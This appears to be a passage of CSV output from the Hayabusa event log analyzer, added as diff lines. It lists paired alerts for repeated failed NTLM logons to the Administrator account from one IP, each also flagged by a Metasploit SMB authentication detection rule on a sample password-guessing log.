+2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MEnlL5BHmlCrtk7p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KRNMpwAAaTsyzPfR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oBtHQkRWIoq5hfn7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5pkk9lgqMQ4wxQel  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yQVan7kRDOlnim50  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9282GqsC7UiUMbRl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3lj7GjYryW9wjGgS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MPy4iUy5WBSLUBdy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0kvD9DEuos8SRrLH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NH1EnMG6fTvcz4QR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cqHDXSQn8gkl2LJy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RWI9XDDHjs2xcNB7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zo53mEz6nal5Gxff  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jtOgC6wqMoNYVxId  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DdadoJYvD7DYjlSG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U1xjdqjT9h0KUqG2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QfkzZBvO4onYx6JZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JqY8CvyODDLQV9Ps  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nPMRIxRVuh13jmZD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jARkTWdKTfTIwlug  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zwhkc71Nfn7QDf7c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qsYad9PgEajlYqvo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v9YPw0DsspVbrOld  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wsHpLCOdAOPFM6nD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OcNytOhGOZKaREL9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lc5boBVigHE1ccGA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BQXg4ZHdBYHyiTTO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JebTJzyn91NrpvkD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8wCE5ypjEU5feEEv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OglsROoqX48xm0gJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5bNC9ES3l3KwXPxb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: byPavQuiscMm7CMW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UQESAC3XpxCJJfG5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5aYRnzirSj0PNXAE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8s9xJ659geFHOlY4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yBQdyO0diiFixwlx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vzULtccOFnLIRiVM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1pDEGzqTAyUab5P8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gomgb26W9qFacRr7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GXOcDu88S5c5VwwV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WHRnzgQkfAhsUguj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A0Q9ZIaRK43W9apv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2xvriGeIlDwtzS36  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pDYTFqeJC61Nneef  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0LNR7xCHW9x2q2qc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AE4EBj8X5IfXO8ZZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
